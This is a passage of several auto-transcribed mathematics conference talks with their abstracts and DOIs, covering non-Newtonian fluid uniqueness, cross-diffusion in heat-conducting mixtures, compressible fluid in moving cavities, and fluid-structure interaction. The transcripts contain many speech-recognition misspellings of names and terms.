The nonlocal Mullins-Sekerka flow can be seen as the $H^{-\frac12}$-gradient flow of the so called sharp-interface Ohta-Kawaski energy. In this talk we will show that three-dimensional periodic configurations that are strictly stable with respect to this energy are exponentially stable also for the nonlocal Mullins-Sekerka flow.
10.14288/1.0398153 (DOI)
So I want to speak about the uniqueness of non-Newtonian fluids with critical power law. So I will consider the following model. This model of generalized Newtonian flow. We have u for velocity, p for pressure, f as external forces and the extra stress tensor is t. And here, Ladigenskaya in 70s suggested that t1 could be of the form of a p-gross where p is some number larger than 1. And the typical examples would be like t1 or t2 of course. If we set p equal to 2, we obtain Navier-Stokes system. And as I mentioned, if p is different from 2, it is model by Ladigenskaya and to state to say in her book from 69. So we have the equation and then we can think about solution and its regularity. So if we pass the equation and integrate by parts, we obtain some kind of energy inequality if we assume that everything goes well because the convective term which is here disappears due to its structure and also pressure disappears. So we can assume that it's reasonable to assume that the solution would satisfy this kind of energy inequality and in particular it should have a natural regularity of solution. So we will assume that the solution is L2 and Lp, W1p. And in this setting, with such a solution that satisfies these two things we will call Larey-Hop solution of our problem. Okay, so now I would like to show you some brief summary of existence of solutions. Since there was extensive work on the problem since 70s, so I will forget someone so I apologize in advance for this. So the studies started with Ladigenskaya in 70s and she proved that if P is larger or equal to 11 over 5, then we have the existence of solutions and the proof was based on monotone operator theory and compactness. So in order to deal with the elliptic term, we use monotone operator theory in order to deal with the convective term, one needs to get some compactness of some embedding and everything is allowed due to the fact that for P larger or equal to 11 over 5, convective term is sufficiently good so that it's allowed to test it as a weak solution. Then I will just take some of the list, some results of the list, then Netschers and his collaborators around 93, studied if it's possible to obtain some information by formally testing the system with Laplace of solution. And it appeared that it's indeed so, therefore they showed that for P larger than 9 over 5 in case of periodic boundary condition, one gets some information, some higher fractional differentiability that however is below regularity scale of the natural solution, but which allows to pass to the limit to identify the limit in the construction in the elliptic term. And they proved the existence of solution for P larger than 9 over 5. And I relate to say that this method gives also some regularity, but for larger P. So this was for periodic boundary conditions. And then the similar method was applied also to homogeneous drift boundary conditions. And it was shown that the solution exists for P larger than 2, and that it's possible to show higher regularity in space if P is larger or equal to 9 over 4. Then, then there appeared to two other methods. One was based on L infinity test function and the other on Lipschitz test functions, where the problems with passage to the limit in approximations of elliptic term was overcome by modifying suitably the weak solution in such a way that it is also for such a small P as suitable test function. So, I just want to say that in a sense this result for P larger than 6 over 5 is in a sense terminal result, because this bound corresponds to the fact that that we want to is compactly embedded into L2. And this is a this is a border for compactness, which deal which allows to deal with this is a collective term. So this is say optimal result in about existence of Larey of solution. Then we have some other results on existence of some other types of solutions. So I should mention that there were studies of measure valued solutions by Netschers and his group, and it was proved that the measure value solution exists for P larger than 6 over 5. And recently there appeared a new notion of dissipative solution which now goes below the bound 6 over 5. It allows a P is only larger than one. And these are dissipative solutions by Anna Abatiello and Hubert Feirazel, where these solutions somehow somehow in definition of these solutions that appears on one more additional term, which in the in the formulation of the equation that somehow captures the possible troubles with a with a passage in an electric term. And it's, I would like to say that these solutions also satisfy some kind of energy inequality, but again in the energy inequality that appears one and additional term. You do, you do connect this term. Very recently there appeared. There appeared an article by Burchak Modena and secular heady. And they show that there exists energy solution and for them energy solution is solution that satisfies the equation in distribution sense, and has a correct regularity, so the regularity that was mentioned before, but they don't need to satisfy energy inequalities. And they showed that such energy solutions exist for P larger than one by method of connection integration. So, so say this is how this goes. It goes deeply below the six over five. So now I would like to speak about uniqueness. So now, basic approach to the uniqueness of the solutions is following so we have to do to the solutions corresponding safety different to different right hand sides. So we assume that we can test this is the problem with this solution itself so he is larger or people to another five and we define the unique as this number. If we subtract the two equations and test them with the difference of solutions we obtain an inequality where on the right hand side, we have all nice terms. So the difference of right hand side is okay. And then there is a reminder of of correct term, which is basically difference in L2 squared times, and now there is you to in W1P to some power P. If we see that it's prepared for application of ground loss inequality. If this function which appears here belongs to L1. So, if you do the solution you to belongs to the space Lp unique W1P, then you obtain uniqueness. So we need regularity of solutions immediately implies uniqueness in this in this sense. So, let us discuss uniqueness in case of purely boundary conditions. So, if you look at the largenz kind of taste that if P is larger than five over two, then actually P is larger than the unique and the obtain uniqueness. And again, for this range we can easily, relatively easily obtain uniqueness. If you want to go below. So, improve regularity somehow and that's why I mentioned this this result by Nicos and his collaborators in 93 because if I already mentioned that they test equation with Laplace you and try to get some regularity out of this, and it appears that in case of purely boundary conditions if P is equal than 11 over five. So, that they obtain such a regularity that uniqueness is implied. And you see that this result is actually in a sense optimal, because in the recent article by Burjark Modena and Shepelahidi, they construct these already mentioned energy solution that do not need to satisfy energy quality. They are non unique. So, actually they show that for a given initial value and right hand side. If they are suitable, then there is many energy solutions if P is less than 11 over five. In this article, there is one more, one more interesting result, namely about the solutions which are solutions that lie in a correct regularity class and also satisfy energy inequality. And, namely, it's shown that if P is less than six over five, then in some cases of suitably chosen initial value and right hand side level solution is not unique for six over five. And then, in case of homogeneous the right boundary conditions and the regularity is a much more technical. So the results are slightly different. So again, the variance square result holds for 12 over five. This is relatively easy. The result of testing with Laplacian was applied by Malik Mishasovichka in 2001, and they obtained that if P is larger than nine over four, then in case of homogeneous the right boundary boundary conditions one obtain sufficient regularity in space, in order to get uniqueness. So, concerning the new new uniqueness of energy solution for P less than 11 over five, I don't know that this result is not yet available. It depends if the group dealing with is a convex integration will write down or not. I don't know if it holds, but I would think that it's still a bit. We see that in case of homogeneous the right boundary condition there is some gap because nine over four is larger than 11 over five. So, there is some depth out unique. So we can ask if the week solution is unique for the larger than 11 over five or equal to 11 over five. And this I won't address now. So, we have already seen that we want to test with time if we are allowed to test with time derivative. So here appears in P. So here is an experiment and for P larger than 12 over five we obtain sufficient regularity to get uniqueness by Laplacian square. So then, but we don't know how to how to, how to decrease this bound. So, if we think about some other tests suitable tests I say testing the second time derivatives situation is even worse to be for which it works is larger than five over two. So we don't know how to deal with these two. So, that's function so what we try is that we try to somehow test with some fractional time derivatives in a, in a sense that we will test with a different difference differences and then divide with a, with a, sometimes that page. So, we need to know the definition of Nikolsky spaces so here, the Nikolsky space is a space of function that somehow have as time derivative where s is between zero and one and the s is here connected with this is a fact that you can that after division of the top of a difference of solution in LPX by h two minus s this quantity is bounded uniformly with respect to H. So we see that the Nikolsky spaces are relatively easy to deal with. So, what we, what we observe is the following thing. So, rewrite the equation in this parabolic sense and then we see that on the right hand side, the main troublemaker is connected to them. And now we realize that if this conductive term if the right hand side belongs to some Nikolsky space with Delta, then it somehow transfers to the regularity of solution you. So, we obtain that you belongs that the regularity of you is improved for original originally we have L infinity L2 and now we obtain Nikolsky some time some differentiability in time infinity L2. And here, the originally had LPW1P but here we obtain again some sigma differentiability in time with some tau and sigma. So, you see the regularity here improves regularity here on the other side. And the second observation is reverse. So, if we have the information that we have here as a conclusion. We can ask if it improves the conductive term and it's indeed so. So we obtain that from the regularity of you, we obtain regularity of conductive term for some suitable Delta and now it appears that this Delta is larger than small Delta and we can iterate. We can iterate this procedure and get that he is larger than 11 over five and as is sufficient. And then, in case that you is in L2 we obtain local regularity of solution and if you is better, we obtain global regularity of solution, which then implies uniqueness or the equal than 11 over five. Of course, still the case of critical exponent P equal to 11 over five is not solved. So, but unfortunately this iteration doesn't work for P equal to 11 over five so one needs to do something else. And the else is initial improvement of regularity by some gearing argument, gearing lemma. What we need to get is to locally in time obtain such kind of inequality, which then immediately by by gearing lemma improves regularity of you in time, just by small epsilon, but this epsilon then allows to start the iteration process and obtain sufficient regularity for uniqueness. So, we are just set what one does the test equation with you minus some time independent capital you use good, good structure of conductive term this is very important that conductive term doesn't make problems in this in these considerations and obtain this inequality, is good up to the time derivative, but one can estimate also this time derivative so that it disappears. And what remains is exactly prepared for this equation is inequality in the first line which is prepared for application of the hearings argument so we obtain improvement of epsilon improvement of regularity of the solution in time. So we start iteration and obtain the theorem, which is again same as the previous one, but now for P equal to 11 over five. I think that my time is over so I think I would stop here. I wanted to say something about conductive bring man for a high model but I think I lost my time. Thank you for your attention. Thank you very much.
We deal with the flows of non-Newtonian fluids in three dimensional setting subjected to the homogeneous Dirichlet boundary condition. Under the natural monotonicity, coercivity and growth condition on the Cauchy stress tensor expressed by a critical power index $p=\frac{11}{5}$ we show that a Gehring type argument is applicable which allows to improve regularity of any weak solution. Improving further the regularity of weak solutions along a regularity ladder allows to show that actually solution belongs to a uniqueness class provided data of the problem are sufficiently smooth. We also briefly discuss if the similar technique is applicable to critical Convective Brinkman-Forchheimer equation.
10.14288/1.0398150 (DOI)
to the organizers for inviting me, since in fact I would not have been able to go to Banff in normal time since it's now a teaching period, so that's nice to sit at home and be at the same time in Banff. Okay, so as already mentioned, I would like to speak about a fluid model for mixtures, which is in fact a cross diffusion system, and this talk is, I will present two models and the main features that I have temperature in it. And the physical setting is as follows, so I have a fluid consisting of n components, and I assume that I do not have any mean or barycentric velocity, so this vanishes, it can be criticized, but I assume this in order to avoid to have navistoxic equations included. And as I said, the main features that the temperature is variable, so I'm considering heat conduction. And then this presentation just to simplify I neglect correction terms. Then this situation can be modeled by so-called Fick-Onsager equations, so I have conservation equations for the partial masses, rho i, with some current densities, which are just the linear combination of the so-called thermochemical potentials. I explain it on the next slide what it means with some coefficients MiJ, which gives the Onsager matrix, and I have a second equation, the equation for the temperature, or here for the energy density, which depends on all the partial densities and the temperature theta, and the heat flux here also gives them a linear combination. So this situation requires some further comments since E and the Q i's are not defined up to now, and I will do it in a thermodynamically consistent way by giving the Gibbs free energy. So it's just a function which depends on these variables, and the thermochemical potentials given by the quotient of the chemical potential, which is just the partial derivative of the free energy with respect to the partial densities divided by the temperature, and the energy density is given by this expression. So these kind of systems they are rather well known in some sense in thermodynamics. They can be derived in the isothermal or for special non-isothermal case, I've given here some references, especially from the French and Italian school, and up to now, so we are interested in studying cross diffusion systems, but we did some analysis only for the isothermal case. So Dieter Bote, for instance, did something and also with E Nus Stelza, we proved something just for these equations here, not for the heat equation here or the energy equation. Okay, so I will not consider this in the whole generality, but I will just study two special models in which the main mathematical difficulty is that the matrices M or N are only positive semi-definite, so they may degenerate, and yeah, this equation is how to deal with this. And for that I need some some techniques from fluid dynamics, and maybe it's interesting. Okay, so the first model is again the Fig-Onzager model, a bit specified, so the MIGJs here are peering again, but now the other matrix is just consisting of these vector components Mi with temperature theta, and the energy equation as then given by this expression, where here I have the MJs of the thermo-chemical potentials, and I have the heat conductivity copper here, or this term. I have some initial data, and I'm considering everything in the bounded domain, and I impose no flux boundary conditions just to simplify things. So here the main feature of this model is that I assume that the sum of all these fluxes is zero, which means that the sum of all these partial densities is constant in time, and then I say that the total mass density, which is rho defined just as the sum, is actually the same like the initial datum, so in the total mass does not change in time. Okay, so for these models I need to specify the free energy in order to specify all the other quantities, and I assume that I have here this rho log rho term, and the term which depends on the temperature, and I think I've forgotten the log here, so the Schottis theta times log theta minus one, sorry for the typo. Then I can compute the thermo-chemical potentials explicitly, so they're given by these expressions, and the energy density is that one of an ideal gas, it's the total mass density times the temperature. So what's interesting is then the assumptions on the matrices, on the matrix, it's symmetric because this is the Onsager relation, and since I assume that the sum of the fluxes is equal to zero, I need to assume that these two sums here are also equal to zero, which means that the kernel of this matrix is non-trivial, and then it's clear that I don't get all the estimates I want to have, and this is here expressed in this kind of coarsivity assumption, so I assume that the matrix is only coercive on the complement of this linear hull or span of the vector consisting just of elements one, and I allow for a second degeneracy, so this is clearly degenerate on this kernel, this matrix or this here vanishes. On the right hand side, I also assume that when rho i is equal to zero, so when I have vacuum, then also I do not have any information. Okay, still we can do something, but before let me mention some ideas, so why did we assume, let me go back these assumptions, so that we have this projection, this is natural because of these assumptions in order to set up the model, that we've introduced in rho i here, I just did it since there is a paper by Pierre-Dierry, and he mentioned that in order to model dilute gases or gas mixtures, then it would be appropriate to include these kind of terms, so he did it in a much more general approach, here's just that example. So the main feature here is now that we get some estimates coming from the entropy density, it's just the derivative of the free energy with respect to the temperature, that's given by this expression here, and when you take the derivative with respect to time along solutions of the system, then you get this expression here, so you get some information on the gradient of the temperature, and then you get some mixed information on well on the thermochemical potentials. I will explain to you how we treat this. First let me show you the existence results, so I now some assumptions on the coefficients, which are well or more or less satisfied for special situations. The most restrictive assumptions may be the conductivity, since here I do not allow for degeneracy, and I need a special growth in theta square, this is because of some estimates. Then we get the global and time, weak solution, which is bounded from below and above, a strictly positive temperature, and we get some regularity, which is natural for weak solutions. So what is the idea in spite of all the difficulties? So the first idea is that I'm removing the last component here of the partial density by all the other partial densities, this is possible since the sum of everything is given by the initial data, which is known, and then I formulate the equations in terms of some kind of dual variables, which are just given here by these logarithmic expressions. And the interesting thing is, and this may be well known for those of you who know these thick-on-zaga approaches, that the reduced matrix, when I remove the last row and column, it's positive definite, at least for positive density. I will come back to this point later. So because of this reformulation and the transformation between Vi and rhoi, I get an infinity bounce. Since I'm now working with the Vi's as the main variables, and the rhoi's are just non-linear functions of the Vi's. And once I've got the solutions Vi, then I can compute the Vi's, and then you see by this expression just inverting this transformation variable that this is bounded by the initial datum. So this is the reason why we get the upper bound. So what is still not clear is, well, this positive definite for rhoi bigger than zero, but it might happen that it's equal to zero. And there we're doing the following. We try to exploit the entropy production term, which is coming from this term here. Because this one is exactly or can be bounded by this expression, and this is bounded. This is something we know from the analysis. And the funny thing is now that this expression also looks very complicated, gives a bounce or some terms cancel, and this gives a bound for the gradient of the square root of the rhoi's. And this gives me the gradient estimate. So by this, I'm overcoming the fact that the matrix M, even the reduced matrix, is only positive semi-definite, since rhoi could be zero. Okay, and then we have another difficulty. Since we need to define objects like this, heat conductivity times the gradient of theta, and that's not so clear how to do it, since we have not much regularity for the temperature. But luckily, taking the test function theta gives h1 estimates for theta square. And by this, we can define these products, which are in some nice, uh, uh, lipic space. Yeah. So everything clearly is combined with some, uh, approximation procedure, which here is now more or less standard and some compactness results. The second model, it looks easier, but it's more difficult from a mathematical viewpoint. So here I have just one species, plus the energy density. And I have here some very special, um, definitions for these thermochemical potentials, and have a special expression for this diffusion or on Zagarmetrics. So this is not coming out of the blue, but this has been derived by Fabry-Schmeiser and Pirna by deriving, or by considering a Boltzmann model with the kind of background temperature exchange. So not the particles are colliding, but there's just an interaction because of the temperature. And in the diffusion limit, they, they got this model. And the nice feature is that there's in fact an underlying thermodynamic structure, since you can find that this is the free energy, uh, you need to consider. And when you, for instance, just for consistency check, you're computing the energy density, which I have not defined here, then you can see that this is given by this expression. Okay. So this model, in fact, it's written maybe in a too complicated way, just to show to you that this fits in the framework of the models I want to consider. Another formulation is this one. So this looks easy, easier, in Cf-Laplace structure, but in fact, it's quite delicate, since you have a degeneracy at theta equals zero, which comes clear here from the, from the on Zagarmetrics. And it's, maybe you can also recognize it here in this equation. Yeah. So we have to treat this, these kind of models. Uh, we have been able to prove also global existence of weak solutions with positive, non-negative, um, density, particle density and, and positive temperature in some space of weak solutions. And in fact, the analysis was a little bit more tricky, um, than for the first model, since we needed three ideas. Okay. The first idea is the same like before. We are just writing down some energy inequality and it's that one. So we get some estimate for the gradient of the square root of the product of particle density and temperature. And then we get some, uh, some information on, on the gradient of, of the temperature on the log of the temperature, which by the way, then gives it positivity. Okay. That's nice, but it's not enough since this kind of regularity is too low to identify here, these products, um, when we pass to the limit in the approximation. So we need further estimates. And here we're exploiting the Laplace structure here and using as our test functions, basically it's more complicated since we have no flux boundary conditions, but basically it's the, they're using as test functions, the inverse of the Laplacian, uh, applied to rho or to E. Then these Laplacian's cancel. And what you get is an, or is an estimate here when you multiply this by row, this is this term. And when you multiply this year by, by E, which is this term. And then after some, some estimations, uh, you get this information and this is kind of higher order integrability for, for your functions in particular. This gives a W11 bound for the energy, well for row times theta and theta itself, which means that for the energy density, you have some gradient bound and this together with a compactness and obelios result gives you strong convergence for, for E. But now the problem is you do not get any gradient information on row. Since I recall, I go back, that this is just a gradient formation of row times theta. And if theta is equal to zero, then you're losing any information. So you need to do something else. And what we did is then taking some tools from, uh, the mathematics of fluid dynamics and we renormalize the equations. So let us assume that we have some approximate solutions, row, epsilon, theta, epsilon. And then the renormalized, um, particle density equation or mass conservation equation is given by this one. So you're using F prime of row epsilon as a test function. And then this is your renormalized equation. And the nice feature is that by this somehow you, you can truncate your row epsilon and you can apply the so-called deep curl lemma. Since using all these estimates you have been before and this truncation allows you to, um, verify the assumptions needed for this lemma. And what you get is then a little bit classical for, for those who know how, how to do it in the Navier-Stokes or for compressible Navier-Stokes at the weak limit of some smooth function F applied to row epsilon times another smooth function G applied of the approximation of the temperature that here the weak limit of the product is equal to the product of the weak limits. And then you need to, to work a little bit that you not only use smooth functions, but use specific, oops, sorry, to specify f and j and you can prove that the weak limit of this one here, oops, here epsilon should go to zero is given by the product of the weak limits of row epsilon and theta epsilon, which I denoted here by row and theta. And this somehow the, the main tool in order to prove that eventually you get that row epsilon converges almost everywhere to, to row and together with the estimates you can conclude. Okay. So this is somehow are these two models. Let me summarize how we treated these degeneracies. So for the first model, we could overcome degeneracy by using these dual entropy variables, by just reducing the system together with entropy estimate some additional estimates for the temperature and using some, yeah, method which I call boundedness by entropy method in order to get L infinity bounds. And for the second model, again, was based on the entropy estimates together with an, or yeah, you can call it H minus one method to get this higher order and degree ability estimates combined with renormalization techniques and deep curve compactness results. Okay. So these were just two very simple examples and you can, can proceed and do things are more, more realistically from a physical viewpoint. So for instance, considering compressible heat conducting mixtures. And this we did with Miroslav, Milan and Nicolat-Samponi, but only for the stationary case. Let me make some advertisement for Milan's talk on Friday at eight a.m. band time. He will present more results on this model. Another model for the transient case, but only for the constant temperature has been considered by Dreijadruj Gajeske and Gulke some years ago, but the transient model is open. So we already started to work on this, but this is really a hard problem. And yeah, maybe you have some ideas. There are also some, some other questions for instance, I use these generacy in row I, you could also use some power here, but the question is, is this really a physical assumption? So it's a little bit ad hoc maybe. But the model of Dreijadruj was a little bit more complicated. So would be nice to understand this better. But over the regularity is quite rather low and would be interesting if you can get more regularity, which is important for numerical approximations and also maybe with the hope to get weak uniqueness of solutions. Okay, that's what I want to say. Thank you very much for your attention.
We present global-in-time existence results for two cross-diffusion systems modeling heat-conducting fluid mixtures. Both models consist of the balance equations for the mass densities and temperature. The key difficulty is the nonstandard degeneracy in the diffusion (Onsager) matrices, i.e., ellipticity is lost when the fluid density or temperature vanishes. This problem is overcome in the first model by exploiting the volume-filling property of the mixture, leading to gradient estimates for the square root of the partial densities, and in the second model by compensated compactness and renormalization techniques from mathematical fluid dynamics. The first model is joint work with C. Helmer, the second one with G. Favre, C. Schmeiser, and N. Zamponi.
10.14288/1.0398145 (DOI)
for invitation here. So it's first time I'm in Banff and it's marvelous place of course. Well, so actually my presentation or there will be several results presented in the next few minutes. And these results are done or were done in collaboration with Professor Galdi, Professor Nechasova and also Bangue Shea. And also I'm very proud that there will be two pictures in my presentation, you know, because usually there are no pictures in my presentation at all. Okay, so well, I'll talk about the body with cavity filled with compressible fluid and okay, so let me switch to my first picture. Yeah, so that's it. I know it's the resolution of this picture is not so high. But I would just like to introduce say my system. Yes, so the system consists the system is called s and it's consist of a body and cavity, as you can see here. So the body can freely move in space and contains some cavity and the cavity is assumed to be filled with some kind of fluid. Yes. And actually, I will present here several results, mainly concerning the long time behavior of such system. Okay, so let me start briefly with history of such such research. Actually, the study of this motion traces back to the pioneering contributions of Stokes, Jukovsky, Poincaré and also Sobolev. And actually, Jukovsky claimed that the motion of such system will be stabilized after some time actually will eventually be rigid motioned and precisely permanent rotations. Well, oh, sorry, sorry. There are many, many works, but say the full generality or for full general system. It was shown by a dessert, Galdim, and in 2016, that actually the Shacoj, Jukovsky conjecture holds holds and they treat the incompressible fluid inside the body. And our aim is to look into the role of the compressibility of that fluid. Yes. So we just put a compressible fluid inside the body, inside the free moving body. Okay, so let me introduce the governing equations. Well, these are usual, the first two equations are usual compressible Navier-Stokes equations. Well, the first equation is momentum equation. Actually, you can see the stress tensor contains some pressure. Yes, so the pressure is given by some barotropic law, a times r power to gamma. This a and gamma are supposed to be positive constants. I will later on show the restriction on them. Then the second equation is a continuity equation or conservation of mass. So the first two equations, as I said, these are usual compressible Navier-Stokes. And then the third equation is a full slip on the boundary. Yes, so you can see here, actually this w is the velocity of the fluid. And on the boundary, the velocity actually is just a rigid motion. Yes, so the rigid motion of the body here is here represented by this omega and this eta. Yes, so this omega is a rotation and this eta is transition. And next we have equations for the rigid motion. Yes, so the first or the fourth equation actually here is the conservation of angular momentum. And the last equation is a conservation of linear momentum. Yes, so you can see actually the fourth equation is a equation for this omega for this rotation. And the fifth equation is equation for transition. Yeah. Okay, so here maybe it's a bit unusual. Here this r is density and w is velocity. Say the reason for this notion is that these two unknowns are on the moving domain. We can switch to the rigid motion. Sorry, we can switch to the non-moving domain. Yes, to the constant in time domain by certain transformation. And we can deduce actually this system. Yes, so this time the domain is fixed. Yes, so you can see it's more convenient. Here just there is two velocity fields, actually velocity v and velocity u. Velocity u is a velocity of the fluid. Together with the rigid motion velocity v is the velocity of the fluid, which is just without the rigid motion. Yes, so this velocity is with respect to the body. Okay, so now let me briefly just mention some of our prior estimates. So we have conservation of mass, we have energy inequality. The energy contains not only the kinetic energy of the fluid and the pressure energy of the fluid, but there is also kinetic energy of the body. These are these two terms. And of course once we have this energy estimate, we are also able to deduce the existence of a big solutions by say standard, theorized Lyon's theory. Okay, so however, because of the boundary condition we have in mind, yes, because the body may possess any free motion, we are also able to deduce the conservation of the modulus of the angular momentum. And this is something that will be presented here without any further technical details. But actually if I introduce the quantity, which is really called m, yes, so this is a tensor of inertia of the body times omega plus integral over the cavity of rho x times u. Then actually this particular quantity fulfills this ODE, yes, so the time derivative of m plus omega times m equals zero. And of course we can multiply the equation by m in order to deduce that the total angular momentum of the whole system is equal to constant, yes. So that's quite nice because actually the system cannot tend to stop, yes. So say the trivial solution is not the correct candidate for the long-time behavior. Okay, so in order to find some candidates, let me consider the steady state system, which of course looks like this, these are the equation without time derivatives. And actually there is one issue, there is one non-uniqueness which might appear due to say some vacuum regions. Actually this non-uniqueness was described in papers by Fiery-Reisel and Petzeltova from 1998 and 1999. And actually this non-uniqueness is quite a bad issue because we would like to have a unique candidate for the long-time limit, yes. So once there will be a unique candidate for the long-time limit, I can say that we are done. Okay, so in order to prevent this non-uniqueness, we would like to assume that there are no vacuum regions and yes, okay, so that will be our assumptions from now on. And we can actually deduce say several lemmas observations. So first of all, a weak solution to the steady state system, if there is any, then it must hold that the relative motion Vs is identically equal to zero. And actually, if there is any weak solution to the steady state system, then we have this particular set of equations and these equations are algebraic equations and not longer PDEs. Yes, so that's quite important for us. Okay, and now I would like to talk also about one existence that is out to the non-steady case. Actually, we are able to deduce that there exists a strong solution. Yes, once the initial data is small enough, yes. So I don't want to comment on this on, but we would like to show that actually every strong solution which is constructed for small initial data converge to some, say, long time limit. Yes. Okay, so in order to show that there is just one candidate, we use the omega limit set. Yes, so just let me recall that omega limit set is a set of all quadruples here denoted by V hat, omega hat, psi hat and rho hat, for which there exists an increasing unbounded sequence of times such that V converges to V hat, omega converges to omega hat, psi converges to psi hat and rho converges to rho hat. And actually, the omega limit set, it is compact, it is connected and it is non-empty. So that's quite standard properties. Secondly, since the density of the strong solutions is bounded from below and from above, then the point in the omega limit set does not contain a vacuum region. Yes, so we can see that the density is always bounded from below and from above. And actually, the omega limit set is invariant under solutions constructed in the previous theorem. Yes, so once there is a strong solution emanating from the point of omega limit set, then such solution remains in that omega limit set. Okay, and now I would like to show or I'm going to show that, say the omega limit set consists of isolated points, because then of course, because the omega limit set is connected, then there is just one point in the possible candidate for the long time limit. And that's our aim here. Yes, so actually, every element of the omega limit set solves the steady state system. And moreover, we have still this conservation of mass and conservation of the magnitude of angular momentum. Yes, so these two equation has to be added to the steady state system. And okay, I'll go a bit quickly through this. Actually, we end up with this set of equations. This is system of eight equations, because actually the first one and the third one, these are system of three equations. Yes, so we can rewrite it as a system of eight unknowns and say eight equations for appropriately defined nonlinear function f, it can be seen as this. Yes, and our aim or our goal was to show that actually the gradient of f under certain condition is regular, because of course, once the gradient is regular, then there are not finitely many, but there are only isolated points can be a solution. So that is our aim. Okay, so sorry, so let me go quickly through that. Actually, this is the gradient of f. You can see it consists of some main part and something what should be negligible, hopefully. Yes, so it consists of some derivatives here. And actually, once we assume that the inertia tensor of the whole system has three distinct value values, and that this rest is small, then actually, the gradient of f is regular. Yes, so this can be of course, claimed under certain conditions. So we end up with this theorem. So actually, if we have a cavity which is of class C4, this is to have this strong, strong existence result. And if we more or less assume that the three eigenvalues of the tensor of the inertia tensor of the whole system are distinct, then there exists a zero such that for all a bigger than a zero, the terminal motion of the coupled system reduces to uniform rotation around an axis parallel to the constant angular momentum. M zero of s passing through its center of mass g. Okay, so here I would like to comment this bit, because here we have a constant a, and I would like to go back to my third slide, I guess. Yes, so okay, fourth slide. Actually, this constant a, it's important, is here in the definition of the pressure. And actually, in order to obtain our main claim, we need to have this constant a sufficiently high. So this means that the main claim is true only for sufficiently incompressible fluid. Yes. Okay, so such theorem is of course, not very suitable for some dependence between the decay rate and the compressibility of the fluid. So that was our main aim. So that's why we treated another case. So this time, we take into account just a system concerning pendulum, not freely moving body, but the pendulum. And in our case, the pendulum is a body which might move, which has just one degree of freedom. Yes, so it can move freely around one axis. Yes. So you can see once again, the system is very similar. However, this time the rigid motion is just described by a scalar omega, and it is expressed as omega times E3 cross x. Yes. So actually, the whole body might move around the E3 axis. Yes. And here, these last two equations are equations for the mechanical oscillator. Yes. Here, this g is actually a direction of gravity. Okay. Of course, once again, we have energy estimate. You can see here the last term or say the one term on the right hand side is actually potential force. And that's why once again, we can deduce the existence of a weak solution. But when we turn our attention to the steady state system, it's much more interesting now because it turns out that we are able to prove some kind of uniqueness. Yes. So that's the stationary system. I would like to comment this on a bit. So first of all, this gamma minus one root of this bracket of this gamma minus one divided by a times gamma times gx plus c, this is actually a density, yes, which is a function of g and c. So actually, the first equation here is the conservation of mass. Then we have here this second equation. Actually, this L, this can be seen as a center of gravity of the whole fluid. This P is just a projection to the first two variables. Yes. So actually, this P of this bracket is just a center of gravity of the fluid. And here you can see there is a scalar times a times some direction of gravity. Yes. And then we have, okay, so the gravity is always the same, or it has always the same magnitude. Actually, we can show that if some density and some direction of gravity is a minimizer of energy functional, then say these two values solve the above system. And we can use the direct method of the calculus of variation to show that there exists a minimizer. So this means that we have an existence of solution to this system. And actually, under certain condition, we are also able to show uniqueness, namely, okay, so since I don't have so much time, I will skip these assumptions here. Just tell me that there are at most two solutions under certain assumptions to the steady state system. One is with D less than zero and one is with D greater than zero. So let me go back. If you take a look here on the second equation, then actually D is something what multiplies the direction of gravity as, and actually, if D is greater than zero, then it means that the direction or the gravity has the same direction as the center of, as the body center of the whole system has. So actually, if D is greater than zero, then you can, you take this particular steady state. If D is less than zero, then you get, say, this upside down steady state. Of course, the second one might be ruled out somehow. For example, we can start with energy, which does not allow to obtain, say, this upside down steady case. Yes. So, and once we, of course, rule out this second steady case, then we are able to claim that actually every renormalized weak solution tends to just one steady case. Yes. So that's our main theorem here. And this pendulum case is for us much more convenient because we are now able to look into the problem of decay rate and how the decay rate of the solution depends on the, on the compressibility of the fluid. And here comes my second picture. Yes. So this is my second picture of this talk. So you can see this is a numerical simulation. And if we take, okay, so this A, this is the constant in the pressure law, actually, if he take A to be small, A equals 0.1, then you can see this is dark line. And actually, the decay is quite fast. And if A is equal to 100, so this is the, say, light line. And you can see that there is still some decay, but it's not so fast. So from this numerical simulation, it follows that actually compressible fluids provides better decay than incompressible fluids. Okay. So that was all. And I would like to thank you for your attention.
We concern the system consisting of a moving body filled with a compressible fluid. We present several existence proofs, however, our main aim is to deal with the long-time behavior of the whole system.
10.14288/1.0398142 (DOI)
I want to introduce a variation in approach to fluid structure interaction. And this is work which was done in collaboration with Malte Kampschute and Sebastian Schwarzacher, who are also both from Prague. So let me just start what I want to talk about. So what I want to talk about is fluid structure interaction. So I mean, the world almost tells it everything. So fluid structure interaction happens always when we have two materials. One is kind of a fluid material and one is a solid material. And they both move and have mutual movement somehow. They influence each other on the movement. So for example, I took this example here from some Journal of Computational Physics. But of course, there are many examples and you can think of like a fluid which is flowing next to an elastic membrane. So this thing here is kind of an elastic membrane. And as the fluid flows, of course, it exerts forces onto this elastic membrane and it starts to move. So in this example, which I just took from this Journal of Computational Physics, it goes up and down and up and down. So this elastic membrane moves quite a lot. So what you can see already that there are many examples in which you have an interaction between fluids and solids. And we can also see that the solid is really moving and deforming a lot. So what you can see is that the deformation of the solid can be large. And it shouldn't be enough to say, OK, we think only of some small or rigid bodies because really here you see an example where the deformation can be quite large. OK, so that's what we want to consider. So maybe that's the main thing of what will be the talk. We will have a fluid structure interaction. We will have some fluid and we have a solid which can really have large deformations. So let me just go to the model and let me just tell you what the key ingredients of this will be, which we have. So we will, of course, fix everything to some fixed container. So you can think of a fixed container like this. So think here, this is like what happens at time zero or what I think of as a reference configuration. So this gray part here is my solid part, I think. And the solid part is best described by its deformation, which I hear the note by Ita. Because of course, we are mostly, for the solid, we are mostly interested where it is. I mean, it's not so important how fast it moves. It's really important where it is. So therefore, we use this deformation here. For the fluid, on the other hand, the main variable which describes what it does is not really where it is because that's not so important for the fluid as it flows all the time. But the main variable here is the velocity. So that's also clear. So what we have is a coupling between Lagrangian and Eulerian coordinates because of course our solid is really described by this deformation, which you can see here. It tells you where every point goes to and the solid by its velocity. So once I have these key ingredients, which describe my materials, I can start up, set up my modeling and for my modeling, I will just take the basic physical laws and those should be satisfied. So the basic physical laws are the balance of masses and momentum. So we have the balance of mass and momentum for the fluid. So that's of course, I mean, I could take a lot of possibilities for the balance of mass and momentum, but I don't think about it a lot. And I just take Navier-Stokes equation, which is maybe the easiest model I can think of for a fluid and I take just the Newtonian fluid. So I have here the inertial terms. I have here the diffusion, which I will call dissipation. I have some pressure and I have some forces and the divergence is zero because everything is of course incompressible. And for the solid, I have the balance of course also of mass, but this is not so important. And I also have the balance of momentum, which here 